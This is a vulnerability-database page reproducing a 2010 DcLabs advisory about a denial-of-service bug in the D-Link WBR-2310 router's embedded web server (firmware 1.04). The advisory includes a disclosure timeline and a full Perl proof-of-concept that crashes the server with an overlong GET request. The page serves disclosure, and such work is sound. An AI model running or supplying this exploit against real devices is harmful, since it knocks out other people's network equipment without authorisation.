Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Dlink WBR-2310 Embedded Web Server 1.04 Denial Of Service

🗓️ 03 Aug 2010 00:00:00Reported by ipaxType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 38 Views

Dlink WBR-2310 Embedded Web Server 1.04 Denial Of Service vulnerabilit

Code
`[DCA-00014]  
  
[Software]  
  
- Dlink WBR-2310 Embedded Web Server  
  
[Vendor Product Description]  
  
- The D-Link RangeBooster G™ WBR-2310 with enhanced 108 features the  
industry’s first default 108Mbps* “Dynamic Mode” that allows clients  
to always operate at the highest possible speeds while automatically  
identifying and recognizing other D-Link RangeBooster G™ products for  
highest performance capability and seamless access to the wireless  
network in a homogeneous environment.  
  
[Bug Description]  
  
- The Embedded Web Server does not sanitize correctly a crafted GET  
request leading to Denial-of-Service.  
  
[History]  
  
- Advisory sent to vendor on 07/20/2010  
- No response from vendor  
- We tried to contact again on 07/30/2010  
- No response from vendor  
- Public advisory & exploit 08/02/2010.  
  
[Impact]  
  
- Low-Medium  
  
[Affected Version]  
  
- Firmware Version: 1.04  
- Hardware Version: A1  
- Prior versions may also be vulnerable  
  
[Code]  
  
#!/usr/bin/perl  
use IO::Socket;  
  
if (@ARGV < 1) {  
usage();  
}  
  
$ip = $ARGV[0];  
$port = $ARGV[1];  
  
print "[+] Sending request...\n";  
  
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>  
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";  
print $socket "GET  
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n";  
  
sleep(3);  
close($socket);  
  
print "[+] Done!\n";  
  
sub usage() {  
print "[-] Usage: <". $0 ."> <host> <port>\n";  
print "[-] Example: ". $0 ." 192.168.0.1 80\n";  
exit;  
}  
  
  
[Credits]  
  
Rodrigo Escobar (ipax)  
Pentester/Researcher Security Team @ DcLabs  
http://www.dclabs.com.br  
  
  
[Greetz]  
Crash and all Dclabs members.  
  
--   
Rodrigo Escobar (ipax)  
Pentester/Researcher Security Team @ DcLabs  
http://www.dclabs.com.br  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 Aug 2010 00:00Current
7.4High risk
Vulners AI Score7.4
dlink wbr-2310embedded web serverdenial of service1.04vulnerabilityfirmware version a1rodrigo escobardclabs
38